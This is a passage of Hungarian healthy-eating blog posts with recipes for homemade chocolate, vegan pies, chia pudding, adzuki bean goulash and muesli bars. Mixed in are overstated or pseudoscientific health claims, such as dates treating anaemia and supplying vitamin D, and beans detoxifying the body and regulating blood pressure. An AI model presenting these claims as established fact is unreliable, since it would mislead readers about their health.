A datolya hatásai DatolyaA datolya (az én egyik kedvencem), már az időszámítás előtti időkben is nagy népszerűségnek örvendett. Az egyik legősibb és az egyik legjobb egészségre gyakorolt hatású gyümölcs. Szerencsére friss és szárított változatban, szinte hasonló tápértékkel rendelkezik.  Magas az ásványi anyag és nyomelem és vitamin tartalma. Sok káliumot, vasat, nátriumot, foszfort, A, B, C és D vitamint tartalmaz. A szervezetet kitűnő energiával látja el, jól lehet hasznosítani sportolásnál, kimerültségnél vagy ha csak nagyon álmosnak érzed magad. Javítja az erőnlétet, állóképességet.  Nagyon jó idegkimerültségnél és legyengült állapotban is, roborálja a szervezetet.  Nyugodt alvást biztosít, mert szerotonin termelést okoz. Magas rosttartalmának köszönhetően, serkenti az emésztést, helyreállítja a bélmozgást, megszünteti a székrekedést. Nagyon magas a vastartalma és C vitamint is tartalmaz, így vérszegénység esetén kiváló terápia a rendszeres datolyafogyasztás. A datolya egészségesen tartja a szívet és segít a koleszterin szint csökkentésében is. A datolya az egyik legédesebb gyümölcs, ezért használják szárítva ledarálva - datolya cukorként ételek ízesítésére, édességek elkészítésére. A blogon elég sok receptben láthattátok. Én minden nap lefekvés előtt elfogyasztok néhány beáztatott datolyát:) Vegyszermentes (bio) datolyát egyél :) Néhány datolyával készült recept a blogról: http:/­­/­­eljharmoniaban.blogspot.hu/­­2015/­­08/­­kokuszos-datolyagolyo-egeszseges.html http:/­­/­­eljharmoniaban.blogspot.hu/­­2015/­­06/­­hazi-keszitesu-egyszeru-cukormentes.html http:/­­/­­eljharmoniaban.blogspot.hu/­­2015/­­12/­­glutenmentes-laktozmentes-cukormentes.html  

Házi készítésű csokoládé - vaníliás, narancsos

2015. november 27. Élj harmóniában 

Házi készítésű csokoládé - vaníliás, narancsosKözelednek az  év végi ünnepek és az utóbbi idő ben egyre több keksz, sütemény, sós finomság recepte t kezdtem el közreadni Nektek - remélem a receptek segítenek ötletet meríteni az egészséges ünne pi finomságokhoz. Ma gondoltam közreadok egy csokoládé receptet. A csokoládét szerte a világon mindenki ismeri és nagyon sokan kedvelik is - ízléstől függően ki mit... keserű csokoládé , tejcsokoládé, töltött csokoládé , kerek csokoládé, lapos csokoládé, lyukas csokoládé. :) A minap olvastam egy statisztikát, miszerint Magyarországon a lakosság 80%-a nagyon szereti a csokoládét és közel 40%-uk  hetente többször fogyaszt csokit. Ez az adat kicsit megdöbbentett, mert  nem gondoltam, hogy ilyen mennyiségben esznek emberek csokoládét - persze Magyarország nem az egészséges és tudatos táplálkozásról híres és sajnos élen járunk súlyproblémások, elhízásos megbetegedések arányát tekintve is. Azért is lepett meg az a statisztika, mert hihetetlen, hogy a boltokban ennyi tonna csokoládét tudnak eladni, amikor elég régen köztudott, hogy a boltok polcain kapható csokoládék nem egészségesek. Szerencsére egyre több helyen lehet olvasni arról is, hogy a tiszta minőségű (bio), adalékok, tartósítószerek nélkül készített csokoládé egészséges és magas az antioxidáns tartalma is. Ha szereted a csokoládét akkor a legjobb ha otthon magadnak készíted bio alapanyagokból. Ha pedig vásárolni szeretnél, akkor válassz magas kakaótartalmú bio csokoládét. A csokoládéfogyasztásnál légy mindig mértékletes:) Az otthoni csokoládé készítéshez korábban a blogra már egy cukormentes mandulás csoki receptet kiraktam (itt olvashatod), most egy narancsos bon-bont készítettem. Hozzávalók: - 10 dkg nyers kakaóvaj - 3 ek. nyers kakópor vagy karob por - 2 ek, méz vagy nádporcukor - vanília - szárított narancshéj A kakaóvajat reszeld le vagy vágd nagyon apróra és tedd egy tálba. Forralj vizet egy fazékban és ha felforrt kapcsold le, majd  vízgőz felett olvaszd fel a kakaóvajat. Add hozzá a kakaót, az édesítőt , a vaníliát és a narancshéjat, majd és keverd össze. A masszát öntsd bon bon formákba és helyezd a fagyasztóba egy kis időre, majd onnan a rendes hűtőbe rakd át, hogy ott teljesen megszilárduljon. Ha megszilárdult akkor ki tudod már venni a formából. A hozzávalókat - magvak, diófélék, fűszerek, aszalt gyümölcsök, édesítők - kedvedre variálhatod is. Ez egy friss csokoládé és nem tartalmaz semmilyen tartósítószert, ezért nem tudod hosszasan tárolni. Vegyszermentes (bio) alapanyagokat használj!

Vegán, cukormentes almás-birsalmás pite-torta

2015. november 18. Mindennapi ételeink 

Vegán, cukormentes almás-birsalmás pite-torta Ismét egy édesség receptjét hoztam, talán karácsony előtt hasznos lehet. Hozzávalók: 30 dkg finomliszt 20 dkg teljes kiőrlésű liszt 1/­­2 csomag  foszfátmentes sütőpor 1 dl olvasztott kókuszzsír  10 dkg eritrit kb. 1-2 dl víz -- 1 kg alma 1/­­2 kg birsalma 10 dkg eritrit 1 bio citrom héja 1 vaníliás cukor vagy 2 tk. vaníliapor 1 ek. morzsa Elkészítés: A liszteket és az eritritet összeöntjük, hozzáadjuk a sütőport. Kimérjük a kókuszzsírt és beleöntjük. Majd annyi vízzel hígítjuk, hogy rugalmas pitetésztát kapjunk. Félretesszük, kissé pihenni, eközben elkészítjük  a tölteléket: az almákat meghámozzuk és megpároljuk. Egy olajozott, lisztezett pite formájú tepsibe belesimítjuk a tészta felét, erre 1 ek. morzsát szórunk rá és erre rákenjük az almás tölteléket, majd befedjük a tészta másik felével. Vízzel hígított lekvárral kenjük meg, ez szép színt ad neki (tojássárga helyett), és még csillogó lesz. Megszórjuk eritrittel. Közepes lángon, kb. 30 perc alatt kisütjük.

Reggelire fel! - Szőlős-kendermagos és Csokis-kókuszos chia puding (gluténmentes, laktózmentes, tojásmentes, hozzáadott cukormentes, vegán, nyers)

2015. október 22. Zöld Avocado 

Reggelire fel! - Szőlős-kendermagos és Csokis-kókuszos chia puding (gluténmentes, laktózmentes, tojásmentes, hozzáadott cukormentes, vegán, nyers) szőlős kendermagos chia puding  (mindenmentes, nyers, vegán) Mostanában ha nem valami zabból készült reggelit eszünk, akkor chia pudingot. Villámgyorsan elkészíthető, nagyon egyszerű, és pár hozzávalóból mennyei, tápláló és vitalizáló, természetesen gyomorbarát reggelit tudunk készíteni. Mint arról már korábban írtam, a zab egy lassan felszívódó, magas rosttartartalmú, az egészséges életmódhoz szervesen tartozó reggeliző gabona, melyből nagyszerű kásákat, morzsákat, kekszeket, palacsintákat, müzliszeleteket stb. lehet készíteni különféle ízesítéssel. Ez nálunk is így szokott történni azokon a napokon, amikor tudom, hogy az ebéd és a reggeli közt túl sok idő fog eltelni, vagy délelőtt sok energiára, erőre lesz szükségem, zabból készült reggelit fogyasztok. De szerencsére nem mindennap ilyen! ;-) csokis kókuszos málnás chia puding  (mindenmentes, nyers, vegán) Sőt! A tél közeledtével egyre több a lusta délelőtt, a lakásban - esetleg ágyban - töltött hosszabb reggelek (főleg hétvégén). Ilyenkor nincs szükség nagy kalóriájú, eltelítő reggelikre. Gyorsan elkészíthető, tápláló és könnyű ételekre vágyunk. Sokáig ellenálltam a nagy chia puding őrületnek, de abban hiszek, hogy egyszer mindent ki kell próbálni, hogy utána véleményt tudjak alkotni róla, így hát egyik reggel a világhíressá vált chia reggeliző puding megérkezett az én konyhámba is... és azóta itt is maradt. :-)  Ki ne szeretné a gyors és egyszerű, de mégis változatos ételeket? Hát ez is egy ilyen! Ráadásul sem glutént, sem laktózt, sem tojást, sem hozzáadott cukrot vagy adalékanyagot nem tartalmaz. Ha pedig télen síelésre adnánk a fejünket, és olyan szálláson szállunk meg családdal, ahol nincs tűzhely, akkor is tökéletes reggeli, mert csak összeborítjuk a hozzávalókat, várunk egy kicsit, és már ehetjük is. Ki-ki a saját maga ízesítése szerint. Az alap 3 hozzávalóból áll, és hogy utána milyen idény szerinti gyümölcsöt, olajos magot, szuper ételt, vagy fűszert teszünk hozzá, csak rajtunk múlik! ;-) Akik figyelmesen követik a blogom észrevehették, hogy chia reggelis posztom volt már nem is olyan régen. Korábban már bemutattam nektek itt a Zöld Avocado vegetáriánus gasztroblogon egy fekete áfonyás poharas chia reggelit, ami akár desszertnek is elmegy. Ebben a bejegyzésben olvashattok a chia mag jótékony hatásairól is. Annyira meghatározóvá vált a chia puding élmény a mindennapjainkban, hogy gondoltam még egy posztot megér, hátha valakit majd ezekkel az ízekkel és képekkel sikerül elcsábítanom a chia puding függők táborába. Szívesen vállalom érte a felelősséget, mert nagyon finom, és nagyon egészséges! ;-) Ebben a posztban két újabb chia reggeli ötlettel szeretnék nektek kedveskedni. A szezonnak megfelelően egy szőlős - kendermagos, és egy egész évben készíthető csokis - kókuszos változatot mutatok meg. Érzitek már a chia puding hullámot? Van kedvetek tovább szörfözni rajta? Kóstoljátok meg, mindig más és más gyümölcsökkel, extrákkal, mert megéri. ;-) szőlős kendermagos chia puding  (mindenmentes, nyers, vegán) HOZZÁVALÓK (1 személyre) az ALAP CHIA REGGELIZŐ PUDINGHOZ: - 2 dl növényi tej tetszés szerint (én mandulatejet vagy kókusztej italt használok legtöbbször) - 2 evőkanál chia mag (egész) - 1 db érett banán a szőlős - kendermagos chia pudinghoz: - az alap chia puding - 1 marék szőlő  - 1 ek kendermag  - 1 ek őrölt arany lenmag a csokis - kókuszoshoz: - az alap chia puding  - 1 marék kókusz chips - 2 ek karob por (vagy bio kakaópor) - 1 ek őrölt lenmag - 1 marék málna vagy egyéb idény szerinti gyümölcs.(Amikor a képet készítettem, még málna szezon volt.) Játszatok az alap recepttel tovább! Az extra hozzávalók, és az ízésítés terén csak a kreativitásunk szabhat határokat. Pl.: fahéj, szerecsendió, gyömbér, kókusz, goji bogyó, citrom, lime, mogyoró, brazil dió, tökmag stb. De láttam már zöld turmixból készült chia pudingot is. :-)   csokis kókuszos málnás chia puding  (mindenmentes, nyers, vegán) ELKÉSZÍTÉS Egyszerűen tegyük a banánt (minél érettebb, minél pötyösebb, annál édesebb), a választott növényi tejet a turmixgépbe, és készítsünk belőle banános tejet. (Ha nincs gépünk, törjük össze villával a banánt.) Öntsük ki a müzlistálba, keverjünk bele két kanál chia magot, és tegyük félre min. egy fél órára. Akár már előző este elkészíthetjük a banános tejet chia maggal, és a hűtőben tárolva pihentethetjük. Minél tovább pihen, annál sűrűbb, annál pudingszerűbb lesz az étel. (Én így jobban szeretem.)  Ha csokis alapot szeretnénk, még a pihenés előtt keverjük hozzá a karob port, vagy a bio minőségű kakaóport a banános tejhez. Ezután tegyük félre pihenni. Kérdeztétek már tőlem. hogy egész szemű vagy darált chia magot használjatok? Próbáltam már mindkettővel, de nekem az egész szemű jobban bevált, és jobban ízlett. Próbáljátok ki, és döntsétek el nektek melyik tetszik jobban?!      chia mag a chia pudinghoz Mielőtt készen állunk rá, hogy elfogyasszuk a jól megérdemelt reggelinket, adjuk hozzá a tetszés szerint választott gyümölcsöt /­­ gyümölcsöket, magokat, dióféléket, fűszereket, vagy akár extra banánt, édesítőszirupot, vagy épp ellenkezőleg reszelt citromhéjat. És már fogyaszthatjuk is a kevés munkát igénylő, ám annál táplálóbb, egészséges reggelinket. Kezdjük a napot finom, tápanyagban gazdag, energiadús ételekkel, és a mosoly mellékhatásként fog jelentkezni! ;-) szőlős kendermagos chia puding  (mindenmentes, nyers, vegán) TÁPLÁLKOZZ, NE CSAK ÉTKEZZ! :-) Megjegyzés1: "A kendermag kedvező biológiai összetétele és jótékony egészségügyi hatása alkalmassá teszi, hogy minden háztartásban helyet kapjon. Fontos külön kiemelni a vegetáriánus konyhában betölthető szerepét, hiszen a hús mellőzésével az egyik fő nehézség a fehérjében gazdag étrend összeállítása. A kendermag kivételes fehérjeforrás, így a szójaérzékenyek számára is alternatívát nyújt. Ezenfelül a kendermag magas rosttartalommal rendelkezik, E-vitamint és nyomelemeket - magnéziumot, káliumot és vasat - tartalmaz, valamint megtalálható benne mind a 9 esszenciális aminosav. ... " Bővebben a CKmagazin-ban csokis kókuszos málnás chia puding  (mindenmentes, nyers, vegán)         Megjegyzés2: Mint minden szuper étel és mesterségesen előállított, nagydózisú vitamint tartalmazó készítmény, a chia mag fogyasztása sem ajánlott nagy mennyiségben, és semmiképpen sem minden  nap. A kevesebb, néha több! jelmondat itt is igaz. A napi 1-2 evőkanál adagot ne lépjük túl, és ne együnk minden nap! Tartsunk néha szünetet. 

Tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán)

2015. október 13. Zöld Avocado 

Tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) A tél közeledtével egyre sűrűbben előkerülnek a leveses fazekak, a mélytányérok. A magyarok nagy levesfogyasztó nemzet hírében állnak, ami a hideg idővel még igazabbá válik. El sem tudjuk képzelni a vasárnapi ebédet, vagy egy ünnepi menüsort, leves nélkül! :-) Pedig sok milliárd ember számára nem olyan természetes a levesek rendszeres fogyasztása, mint számunkra. Ha pedig beköszönt az ősz, még szívesebben kanalazgatunk egy-egy forró zöldséglevest, krémlevest, vagy akár egy tartalmas babgyulást. A nyáron sokkal több friss és lédús gyümölcshöz és zöldséghez jutunk, mint télen, így a téli folyadékpótlás nagy részét ilyenkor a levesek biztosítják. Mi magunk is nagyon szeretjük őket. Gyakran készítek hamis gulyásokat, például csicseriborsóval (hús helyett), lencsével, vagy az egyik nagy kedvencünket, a babgulyást. Amióta megismerkedtem az adzuki babbal, előszeretettel készül a konyhámban adzuki babos gulyásleves mindenki nagy örömére. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Az adzuki bab Kelet - Ázsia közkedvelt alapanyaga, ahol nem csak leveseket és salátákat készítenek belőle, de teákat, és édeskés ízének köszönhetően finom desszerteket is. " A növény magjait már időszámításunk előtt 1000 évvel fogyasztották Kínában és Koreában. Japánba, ahol jelenleg is nagyon kedvelt élelmiszer, csak később került. A kelet-ázsiai konyhában az adzukibabot édesen szokás fogyasztani. Általában cukorral főzik össze és így jön létre az a bizonyos bab paszta, ami az egyik legfontosabb összetevője a kelet-ázsiai ételeknek, édességeknek. Gyakran ízesítik is, ugyanúgy, mint a gesztenyemasszát. A vörös bab masszát számos kínai ételhez is felhasználják, mint például a vörös bab fagylathoz. Rengeteg japán édességben is megtalálható. 2009. október 20.-án pedig a Pepsi kiadott egy adzukibab ízesítésű iható terméket is." Forrás: Wikipedia 10 OK, HOGY MIÉRT FOGYASSZUNK ADZUKI BABOT? 1) A fejtett babok a vegetáriánus táplálkozás fontos pillérei, mivel nagyszerű fehérjeforrások, tökéletes húspótlók a szervezet számára. Az adzuki bab a makrobiotikus táplálkozók körében is az egyik legkedveltebb hüvelyes, nagyon magas fehérjetartalmának köszönhetően. 2) Jelentős B1- és B2 vitamintartalma mellett, hasznos vas-, kalcium-, magnézium és foszfor forrás. 3) Magas kalóriatartalma ellenére alacsony zsírtartalommal rendelkezik. 4) Rendkívül magas rosttartalmának köszönhetően csökkenti a koleszterinszintet. 5) Alacsony glikémiás indexének köszönhetően természetes inzulinszabályozó. Egyensúlyban tartja a vércukorszintet, így cukorbetegek számára is kifejezetten ajánlott a fogyasztásuk. 6) Oldhatatlan rosttartalma jótékony hatással van a belek mozgására, a székrekedésre. Ennek köszönhetően csökkenti a végbél- és vastagbélrák kialakulásának kockázatát. 7) A felgyorsult bélmozgásnak köszönhetően remekül méregtelenít, salaktalanít. 8) A hagyományos kínai gyógyászat szerint a kínai vörös bab, a szív gabonája, mert egyszerre tisztítja meg a szívtüzet és tölti fel vérrel a szívet. Tökéletes vérnyomás-szabályozó. 9) Magas rosttartalma miatt hosszú ideig telítettség érzést okoz, és ez párosítva az alacsony zsírtartalommal, és az alacsonyan tartott vércukorszinttel, segít a testsúlyunk kordában tartásában, a fogyásban. 10) Magjának csíráztatásával értékes esszenciális aminosavakhoz juthatunk. +1) Fontos élelmiszer alapanyag funkciója mellett, hasznos kozmetikum is. Bőrápolóként friss, puha, energiával teli arcbőrt kapunk, egy-egy adzuki babbal készített pakolás vagy lemosó után. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Magyarországon leginkább vörös színű adzuki babot lehet vásárolni bioboltokban, de létezik fehér, fekete és szürke színben is. A többi babhoz hasonlóan ezt is áztassuk be előző éjszaka, hogy könnyebben meg tudjuk főzni. Vigyázzunk, mert az adzukibab hamarabb megfő, mint a hagyományos bab, nekem is sikerült túlfőznöm. ;-)  Főzve, fagyasztóban tárolva, akár hónapokig is eláll, így bármikor amikor szeretnénk, csak előkapjuk és változatos formában, különböző ételekben felhasználhatjuk. Itt a Zöld Avocado vegetáriánus gasztroblogon egy hagyományos babgulyást készítettem nektek, de használhatjuk saláták alapanyagaként, pörköltökbe, kenyérre kenhető krémként, sütőtököt tölthetünk meg vele, fogyaszthatjuk rizses egytálételbe, mexikói ételek töltelékeiként, tortillával, chipsz-szel, de akár édességek alapanyagaként is. A későbbiekben biztosan ki fogom próbálni, mint desszert alapanyag! ;-) tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) HOZZÁVALÓK - 4 db közepes sárgarépa - 1 db nagyobb fehérrépa - 500 g bio adzuki bab (előző éjszakára beáztatva) - 2 db közepes vörös hagyma - 2-3 ek olívaolaj (vagy répceolaj) - 1 közepes érett paradicsom - Himalája só, őrölt fekete bors, 3 db bio ételízesítő leveskocka, 1 ek mustár - 1 nagy marék friss petrezselyem - nagy fazék tiszta víz -  - gluténmentes csipetke: (barna) rizsliszt, Himalája só, víz (elhagyható) tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) ELKÉSZÍTÉS Mint minden leves, ez is nagyon egyszerűen elkészíthető! Az apróra vágott vöröshagymát olajon megdinszteljük, majd rászórjuk az apróra vágott paradicsomot. 1-2 perc kevergetés után, hozzáadjuk az előre beáztatott adzuki babot, a megtisztított és felkarikázott sárgarépát, a fehérrépát felvágva kb. 8 darabba. Az egészet felengedjük kb. háromszoros mennyiségű vízzel, és hozzáadjuk a fűszereket, illetve az apróra vágott petrezselymet. Fedő alatt, közepes lángon, kb. 1 óra alatt készre főzzük a babgulyást. Közben néha megkeverjük. (Nem szükséges liszttel sűríteni) Amikor már puha a bab és a répa is, beleszaggatjuk a gluténmentes csipetkét. Sajnos nem tudok pontos mennyiségeket írni, mert érzésre készítem. Egy müzlistálat félig töltök rizsliszttel, hozzáadok kb. 1 tk Himalája sót, és annyi vizet, hogy csipkedhető keményebb tésztát kapjak. Olyan gyurmaszerű állagot. A forrásban lévő levesbe csipkedjük lisztes kézzel a csipetkéket. A méretét szabadon megválaszthatjuk. Általában a nokedlinél egy kicsit nagyobb galuskákat tépkedek, amik a főzés során még egy kicsit meg is fognak dagadni. Miután az összes csipetke a levesben van, visszatesszük a fedőt, és még kb. 5 percig főzzük az egészet egybe. Ezután tálalható is a gazdag és tápláló, meleg adzukibabból készült gulyásleves. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Táplálkozz és ne csak étkezz! Jó étvágyat kívánunk! :-) Amíg elkészül a gulyásleves, készítsetek mellé például mindenmentes, narancsos sütőtökös diós kuglófot,  mindenmentes, narancsos sütőtökös diós kuglófvagy laktózmentes,  amerikai banán-palacsintát,  laktózmentes, amerikai banán-palacsinta vagy tojásmentes , túrós kakaós zabpalacsintát. (Ez utóbbi kettő már nem vegán, és nem is gluténmentes ételek.)  tojásmentes, túrós kakaós zabpalacsinta Megjegyzés1: Nem tudom, hogy ti már észrevettétek-e, de a gulyáslevesek, és a pörköltek sokkal, de sokkal finomabbak, és zamatosabbak másnap, illetve harmadnap. Minél "érettebb", annál ízesebb! Legalább is nekem ez a tapasztalatom. ;-) Így ha vendégeket szeretnétek elkápráztatni egy hamis gulyáslevessel, pörkölttel (pl.: csicseriborsó pörkölt), akkor készítsétek el még előző nap, és hagyjátok összeérni az ízeket. Megjegyzés2: A hüvelyesek, gabonákkal történő fogyasztása tökéletes fehérjeforrás, és egymást kiegészítve teljesértékű tápláléknak számít. tápláló babgulyás adzukibabból (gluténmentes, laktózmentes, tojásmentes, vegán)

Reform almás pite - tönkölybúzaliszttel

2015. október 6. Élj harmóniában 

Reform almás pite - tönkölybúzaliszttelReform almás pite Az alma jótékony hatásairól egy korábbi bejegyzésben már írtam (itt olvashatod). Az almát nagyon szeretem és ősszel hatalmas mennyiségeket vagyok képes megenni belőle nyersen (akár fahéjjal gyömbérrel, akár sóval és borssal). A férjem nyersen nem annyira nagy rajongója, jobban szereti valamilyen sült vagy főtt formában - leginkább süteményekben:)  Szerintem így ősszel az egyik leggyakrabban készített édesség, az almás pite. Nagyon sokféle változata létezik, mindenki szereti és egyszerű elkészíteni.  Nekem is van többféle recept amit szoktam készíteni.  Most egy vékony tésztájú almás pitét készítettem és  alacsony cukortartalommal - így az íze natúrabb lett, de a receptben a cukor mennyiségét tudod saját ízlésednek megfelelően alakítani. Hozzávalók: - 45 dkg liszt  (nálam fele fele: teljes kiőrlésű tönkölybúzaliszt és fehér tönkölybúzaliszt) - 15 dkg vaj  - 1 citrom (héja+leve) - vanília - 2-4 ek. joghurt - 1 kk. szódabikarbóna - 5 dkg barna nádcukor (cukormentes diétában elhagyható) Töltelékhez - 1,5 kg alma - fahéj Az almákat mosd meg, pucold meg és reszeld le vagy aprítóval aprítsd fel. A citromot mosd meg, majd reszeld le a héját és csavard ki a levét. Egy tálba gyúrd össze a tészta hozzávalóit. Az így kapott tésztát vedd két részre - az egyik rész picit legyen nagyobb mint a másik. Nyújtsd ki először a nagyobb gombócot, majd béleled ki vele a tepsit. Az alma miután állt, elkezd levet ereszteni. Alaposan nyomkodd ki a levet az almából és a kinyomkodott almát keverd össze fahéjjal - aki nagyon édesszájú keverhet hozzá néhány evőkanál cukrot is. Helyezd a tölteléket a tepsibe, majd nyújtsd ki a másik tésztagombócot is. Helyezd az almás pite tetejére a kinyújtott tésztát, és villával szurkáld meg, hogy a gőz majd távozni tudjon. 180 fokra előmelegített sütőben süsd készre (kb. 40 perc). vegyszermentes (bio) alapanyagokat használj:)

Reggelire fel! - házi müzliszelet, természetes hozzávalókkal (laktózmentes, tojásmentes, hozzáadott cukormentes, vegán)

2015. szeptember 16. Zöld Avocado 

Reggelire fel! - házi müzliszelet, természetes hozzávalókkal (laktózmentes, tojásmentes, hozzáadott cukormentes, vegán) vegyes gyümölcsös, házi müzliszelet természetes hozzávalókkal (hozzáadott cukormentes, vegán)  Ti mit szoktatok reggelizni? Szeretitek a gabonapelyheket? És a zabot? Ismeritek a müzlit? Gondolom, igen! :-) Ki ne ismerné, ezt az eredetileg alpesi pásztorok által fogyasztott ételt?! A pásztorok után egy zürichi orvos is felfedezte a müzli jótékony hatásait, és elkezdte népszerűsíteni betegei körében. A  reggelire fogyasztott, gabonából, magokból és gyümölcsökből álló ételek jót tesznek az emésztésnek, mert rostban sokkal gazdagabbak, mint az egyéb, hagyományos húsos, tojásos, kenyeres reggelik. Eredetileg kizárólag a kórházi betegek napindító étke volt, majd annyira népszerű lett a müzli (müesli), hogy ma már nincs olyan élelmiszerbolt, ahol ne juthatnánk hozzá különböző ízesítésben egy-egy zacskó müzlihez, vagy egy-egy szelet  éhségcsillapító energiaszelethez.  zabpehelyA zab lassú felszívódásának, az aszalt gyümölcsök magas cukortartalmának és az olajos magvaknak köszönhetően, hosszú ideig telítettség érzést, és energiát tud biztosítani egy tál müzli, vagy egy müzli szelet, egy granola, vagy akár egy feltúrbózott zabkása is reggelire elfogyasztva. Azonban ne dőljünk be az élelmiszergyártók trükkjeinek, és csak azért, mert nem tartalmaz hozzáadott cukrot a kedvenc müzlink, még egyáltalán nem számít diétás ételnek. Fogynivágyók készítsék el otthon a saját müzlijüket, müzliszeletüket, kevés aszalt gyümölccsel, ha biztosra akarnak menni. ;-) Mert a müzli egészséges, de nem fogyókúrás!  Az eredeti receptben (pont ellenkezőleg a mai változatokkal) kevesebb volt a zab, és több a gyümölcs. Úgy vélik, hogy valahogy így nézhetett ki a svájci müesli: " 1 evőkanál zabpehely, 1 nagyobb, lehetőleg savanykás, reszelt alma, 1 evőkanál darált mandula vagy mogyoró, egy evőkanál citromlé és ugyanennyi tejszín (cukrozott sűrített tej)."  Forrás: Origo Itt a Zöld Avocado gasztroblogon korábban megjelent almás-fahéjas zabmorzsa, egy nagyon hasonló reggeli recept.   házi müzliszelet (vegán) Természetesen nem csak reggelire célszerű zabból készült ételeket fogyasztani. Egy müzliszelet, tökéletes utitárs hosszabb túrák közben, utazások alatt, nagyobb kalóriavesztéssel járó fizikai aktivitáskor, vagy akár az iskolatáskában is. A testedzők, sportolók is előszeretettel fogyasztják a különböző energiaszeleteket, fehérje /­­ protein rudakat. Gyors és teljesértékű energiát biztosítanak könnyedén. Bár ezer meg ezer féle variácóban hozzájuthatunk már a boltokból ehhez a finom és egészséges nassolnivalóhoz, a legjobb mégiscsak, ha mi magunk készítjük el otthon. Egyszerű, gyors, sokáig eltárolható, biztosan adalékanyag- és hozzáadott cukormentes, általunk választott magas minőségű hozzávalókból készül, és olyan ízesítéssel alkothatjuk meg az energia szeletünket, amilyennel csak szeretnénk. :-)  Én is rendszeresen készítek itthon müzliszeletet, ami aztán a fagyasztóba téve várja a napot, amikor "pont erre van szükségünk". A napot, mikor csak arra van idő, hogy gyorsan valami életmentőt bekapjunk, ami energiával tölt fel, és már rohanunk is tovább. Ilyenkor mindig nagyon hálás vagyok érte, hogy a szabadnapomon rászántam azt a másfél-két órát, és elkészítettem a kedvenc müzliszeletünket. ;-) A fagyasztóból kivéve, 15 perc alatt felenged és már fogyasztható is.  Sokféleképpen készítem én is, attól függően, hogy mikor mi van itthon, vagy mikor milyen kedvem van?! ;-) Most egy egyszerű, vegyes gyümölcsös alap receptet mutatok meg nektek, ami zabpehellyel készült. Később hozok még majd más gabonával, és ízesítéssel készített verziókat is. Próbáljátok ki a következő receptet, vagy az arányokat megtartva, formáljátok a saját ízlésetekre! Aki egyszer elkezdi a házi müzliszelet gyártást, nem tudja abbahagyni! :-) Neked van már kedvenc házi müzliszeleted?       vegyes gyümölcsös, házi müzliszelet természetes hozzávalókkal (hozzáadott cukormentes, vegán)  HOZZÁVALÓK (kb.30 darabhoz) : - 2 csésze apróbb szemű zabpehely (vagy nagyszemű, de akkor egy kicsit daráljuk meg, hogy könnyebben összeálljon a müzli szelet) - 1,5 csésze banán püré (minél érettebb a banán, annál édesebb  - 1 tk Himalája só - 1 tk fahéj - 1 csésze tiszta víz - 1/­­2-1 csésze kókusz reszelék - 1 ek őrölt lenmag  - 1,5 csésze apróra tört natúr, olajos mag, dióféle tetszés szerint (pl.: napraforgómag, tökmag, dió, mogyoró, brazildió, kesudió, mandula, szezámmag, mák stb.) - 1,5 - 2 csésze tetszés szerinti aszalt gyümölcs feldarabolva kis darabkákra (pl.: sárgabarack, cseresznye, áfonya, szilva, mangó, mazsola stb. ki mit szeret, de figyeljünk, hogy ne cukrozott aszalt gyümölcsöt vegyünk.) - bármilyen "super food" szívesen növeli a tápanyagértékét egy müzli szeletnek (pl.: goji bogyó, chia mag, kendermag, méh pollen stb.)   Aki édesszájú, az tegyen bele 2-3 ek mézet, vagy agave szirupot is. vegyes gyümölcsös, házi müzliszelet sütés előtt (vegán)  ELKÉSZÍTÉS: A banán pépet elkeverjük a fahéjjal, sóval, (chia maggal,) és a zabpehellyel. Állni hagyjuk egy fél órát, hogy a zab egy kicsit megszívja magát. Közben felaprítjuk a választott magokat és aszalt gyümölcsöket. Tapadásmentes sütőpapírral béleljük a nagy tepsit. (Ha a sütőpapír nem a legjobb, nem megbízható, akkor kenjük meg a sütőpapírt kevés kókuszolajjal, hogy tuti jó legyen, és ne ragadjon rá a müzliszelet.) házi müzliszelet hozzávalók Egy nagy keverő tálban összedolgozzuk a banános zabot a gyümölcsökkel. Hozzáadunk 1 csésze vizet, és a magokat, meg a kókuszreszeléket. Most már képtelenség keverni, ezért inkább csak vagdossuk a fakanállal, míg nagyjából mindenhová jut mindenből. Akár kézzel is segíthetünk a ,,dagasztásban. A kész, darabos masszát a tepsibe ,,öntjük, és eldolgozzuk laposra. Nem könnyű, mert elég szilárd a massza, de kézzel itt is rásegíthetünk. Ráhelyezünk a nyersanyagra még egy sütőpapírt, és nehezéket pakolunk rá, hogy lenyomja a nyers müzli tészta tetejét, és szép egyenletesen lapos felszínt kapjunk. (tehetünk rá pl.: könyveket, vagy nagy 5 l-es ásványvizes kannákat stb.) Így hagyjuk egy fél órát, majd a nehezékektől és a felső sütőpapírtól megszabadítva, mehet a sütőbe. 170 °C -ra előmelegített sütőben, kb. 25 perc alatt aranybarnára sütjük. De! Közben 10 perc sütés után, vegyük ki az egész tepsit, és vagdossuk be a masszát úgy, hogy egyforma müzliszeleteket kapjunk. Majd mehet vissza a sütőbe a maradék 15 percre. vegyes gyümölcsös, házi müzliszelet (hozzáadott cukormentes, vegán)  A megsült müzliszeleteket ha szükséges, még melegen egy lapáttal, toljuk távolabb egymástól, és engedjünk levegőt a sütőpapír és a müzli szelet közé, hogy biztosan ne ragadjon rá.  Miután teljesen kihűltek, tegyük félre a másnapi adagot, és a többit - kiporciózva egyesével vagy kettesével - kisebb sütőpapírokba csomagolva tegyük a fagyasztóba. Bármikor amikor csak energiára lesz szükségünk, kiveszünk egy pakkot, és kb.15 perc múlva már újra is tölthetjük magunkat! ;-)  vegyes gyümölcsös, házi müzliszelet természetes hozzávalókkal (hozzáadott cukormentes, vegán)  Ha csak egy gyors harapnivalóra van szükséged, készíts házi müzliszeletet, hogy táplálkozz, ne csak étkezz! :-)  Megjegyzés: Ha lenne házi aszalógépem, azon készíteném el, mert úgy még egészségesebb. Az a baj a sütéssel, hogy magas hőfokon rengeteg értékes tápanyag, enzim megsemmisül, ami a gyümölcsökben, magvakban benne volt. Az alacsony hőmérsékleten történő aszalás (max.42 fok) segít megőrizni ezeket az értékes enzimeket. Ezesetben azonban használjunk csíráztatott zabot, ne zabpelyhet, mert a megfelelő 